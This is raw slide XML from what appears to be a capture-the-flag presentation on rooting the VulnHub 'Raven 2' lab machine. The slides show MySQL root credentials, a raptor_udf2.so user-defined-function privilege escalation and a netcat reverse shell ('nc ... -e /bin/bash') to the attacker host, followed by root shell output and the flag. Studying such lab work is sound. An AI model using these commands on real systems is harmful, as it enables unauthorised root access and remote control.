                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23"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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="0"/>
            <a:ext cx="24377700" cy="1725300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setting up / Replicating the exploit on “Target 2“</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;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27</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878325" y="3165225"/>
            <a:ext cx="12700200" cy="2154900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE599"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="171450" dist="66675"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3200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Now that we have identified the exploit we need to use its only a matter of getting the file onto the target machine. The easiest way to do that was to set up a simple python http server and pull the file down using wget on the target machine. </a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878325" y="5728650"/>
            <a:ext cx="12700200" cy="1708500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE599"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="171450" dist="66675"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3300">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>we needed to enumerate the files. After that we enter MySQL database  by running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>mysql -u root -p’R@v3Security’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and we select the mysql database by running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>use mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="388" name="Google Shape;388;p44"/>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3916500" y="2379065"/>
            <a:ext cx="9580799" cy="10575235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389" name="Google Shape;389;p44"/>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78325" y="7894000"/>
            <a:ext cx="8337500" cy="5020400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Google Shape;390;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9558825" y="8089575"/>
            <a:ext cx="4019700" cy="4810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i="1" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Note:</a:t>
            </a:r>
            <a:endParaRPr sz="3000" i="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>After selecting the mysql database we created a table and used the commands as shown in the outline. Which is where we ran into a snag…</a:t>
            </a:r>
            <a:endParaRPr sz="3000" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Google Shape;391;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933450" y="2095600"/>
            <a:ext cx="168555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0" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Continuing attempts ...</a:t>
            </a:r>
            <a:endParaRPr sz="5000" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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86"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38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89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38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90"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="390"/>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88"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1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32800" y="0"/>
            <a:ext cx="24443100" cy="1716900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Becoming Root (In Theory)</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398;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28</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190475" y="2964750"/>
            <a:ext cx="13187400" cy="4248300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE599"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="200025" dist="7620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3300"/>
              <a:t>After many attempts and for whatever reason mysql did not recognize the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1"/>
              <a:t>do_system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300"/>
              <a:t> and would throw an error everytime we tried to run the command:</a:t>
            </a:r>
            <a:endParaRPr sz="3300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1"/>
              <a:t>create function do_system returns integer soname ‘raptor_udf4.so’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="3300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300"/>
              <a:t>So this is how you would escalate to root, in theory, if everything ran as it was supposed to.</a:t>
            </a:r>
            <a:endParaRPr sz="3300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Google Shape;400;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15013450" y="1921775"/>
            <a:ext cx="8526300" cy="1100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a:t>mysql&gt; create function do_system returns integer soname 'raptor_udf2.so';</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Query OK, 0 rows affected (0.00 sec)</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mysql&gt; select * from mysql.func;</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>+-----------+-----+---------+----------+</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>| name      | ret | dl      | type     |</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>+-----------+-----+---------+----------+</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>| do_system |   2 | raptor_udf2.so | function |</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>+-----------+-----+---------+----------+</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>1 row in set (0.00 sec)</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mysql&gt; select do_system('nc -nv 192.168.63.4 1234');</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>+---------------------------------------+</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>| do_system('nc -nv 192.168.63.4 1234') |</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>+---------------------------------------+</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>|                                     0 |</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>+---------------------------------------+</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>1 row in set (0.00 sec)</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mysql&gt; select do_system('nc -nv 192.168.63.4 1234 -e /bin/bash');</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>root@kali:~/vulnhub/raven2# nc -lvnp 1234</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>listening on [any] 1234 ...</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>connect to [192.168.63.4] from (UNKNOWN) [192.168.63.3] 48434</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>id</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>uid=0(root) gid=0(root) groups=0(root)</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>cd /root</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>flag4.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>cat flag4.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>  ___                   ___ ___</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t> | _ \__ ___ _____ _ _ |_ _|_ _|</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t> |   / _` \ V / -_) ' \ | | | |</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t> |_|_\__,_|\_/\___|_||_|___|___|</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b="1"/>
              <a:t>flag4{df2bc5e951d91581467bb9a2a8ff4425}</a:t>
            </a:r>
            <a:endParaRPr sz="1900" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>CONGRATULATIONS on successfully rooting RavenII</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="401" name="Google Shape;401;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="24637" b="28718"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190475" y="8009212"/>
            <a:ext cx="13187400" cy="4613262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="200025" dist="7620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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11"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4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0"/>
            <a:ext cx="24377650" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;p46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22587337" y="12435245"/>
            <a:ext cx="1462800" cy="1049700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Google Shape;409;p46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7346525" y="5701200"/>
            <a:ext cx="9684600" cy="2313600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
